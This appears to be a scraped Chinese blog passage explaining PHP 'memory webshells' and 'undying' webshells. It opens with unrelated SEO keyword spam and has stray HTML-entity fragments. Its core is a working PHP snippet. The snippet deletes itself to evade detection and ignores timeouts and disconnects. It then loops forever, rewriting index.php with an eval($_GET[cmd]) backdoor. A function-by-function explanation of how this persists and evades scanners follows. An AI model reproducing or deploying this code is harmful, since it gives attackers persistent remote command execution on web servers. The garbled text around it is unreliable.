wordpress怎么放音乐,搜狗整站优化,营销型旅游网站建设,宁波网站建设电话内存马概念
内存马是无文件攻击的一种常用手段#xff0c;利用中间件的进程执行某些恶意代码。首先要讲的是PHP不死马#xff0c;实质上就是直接用代码弄一个死循环#xff0c;强占一个 PHP 进程#xff0c;并不间断的写一个PHP shell#xff0c;或者执行一段代码。
不死…内存马概念
内存马是无文件攻击的一种常用手段利用中间件的进程执行某些恶意代码。首先要讲的是PHP不死马实质上就是直接用代码弄一个死循环强占一个 PHP 进程并不间断的写一个PHP shell或者执行一段代码。
不死马剖析
?phpset_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while (1) {$content ?php eval($_GET[cmd]);?;file_put_contents(index.php, $content);usleep(10000);}
?
set_time_limit()函数设置允许脚本运行的时间单位为秒如果设置该运行时间sleep()函数在执行程序时的持续时间将会被忽略掉ignore_user_abort()函数函数设置与客户机断开是否会终止脚本的执行如果设置为True则忽略与用户的断开unlink(__FILE__)函数删除文件防止文件落地被检测工具查杀file_put_contents函数将一个字符串写入该文件中usleep函数延迟执行当前脚本数微秒即条件竞争 需要特别注意的是执行 unlink(__FILE__) 并不会删除正在运行的 PHP 脚本本身因为脚本在执行过程中已经被加载到内存中。相反它会删除磁盘上的文件如果文件正在被其他进程使用删除操作可能会失败。
